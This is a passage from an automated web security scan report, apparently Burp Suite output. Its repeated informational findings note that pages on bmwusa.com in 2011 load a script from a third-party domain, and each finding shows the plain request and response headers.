Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:41:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:01:50 GMT;path=/
Content-Length: 212055


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.241. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive35i/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x3/xdrive35i/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/x3/xdrive35i/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:44:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:04:35 GMT;path=/
Content-Length: 224831


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.242. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive35i/features_and_specs/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x3/xdrive35i/features_and_specs/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/x3/xdrive35i/features_and_specs/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:44:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:04:31 GMT;path=/
Content-Length: 224832


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.243. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive35i/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x3/xdrive35i/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/x3/xdrive35i/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:42:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:02:19 GMT;path=/
Content-Length: 239217


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.244. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive35i/modelhighlights/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x3/xdrive35i/modelhighlights/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/x3/xdrive35i/modelhighlights/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:42:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:02:07 GMT;path=/
Content-Length: 239218


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.245. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive35i/x3seriessavmediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x3/xdrive35i/x3seriessavmediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/x3/xdrive35i/x3seriessavmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:46:21 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:06:21 GMT;path=/
Content-Length: 201679


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.246. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive35i/x3seriessavmediagallery.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x3/xdrive35i/x3seriessavmediagallery.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/x3/xdrive35i/x3seriessavmediagallery.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:43:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:03:00 GMT;path=/
Content-Length: 201680


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.247. http://www.bmwusa.com/standard/content/vehicles/2011/x5/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x5/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/x5/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:57:44 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:17:43 GMT;path=/
Content-Length: 199801


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.248. http://www.bmwusa.com/standard/content/vehicles/2011/x5/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x5/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/x5/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:46:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:06:31 GMT;path=/
Content-Length: 199802


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.249. http://www.bmwusa.com/standard/content/vehicles/2011/x5/x5savexplorenew.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x5/x5savexplorenew.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/x5/x5savexplorenew.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:46:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:06:45 GMT;path=/
Content-Length: 180315


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.250. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35d/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x5/xdrive35d/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/x5/xdrive35d/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:53:21 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:13:21 GMT;path=/
Content-Length: 214470


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.251. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35d/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x5/xdrive35d/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/x5/xdrive35d/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:54:04 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:14:04 GMT;path=/
Content-Length: 224849


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.252. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35d/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x5/xdrive35d/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/x5/xdrive35d/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:53:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:13:37 GMT;path=/
Content-Length: 214642


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.253. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35d/x5seriessavmediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x5/xdrive35d/x5seriessavmediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/x5/xdrive35d/x5seriessavmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:54:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:14:20 GMT;path=/
Content-Length: 202223


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.254. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35d/x5seriessavmediagallery.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x5/xdrive35d/x5seriessavmediagallery.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/x5/xdrive35d/x5seriessavmediagallery.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
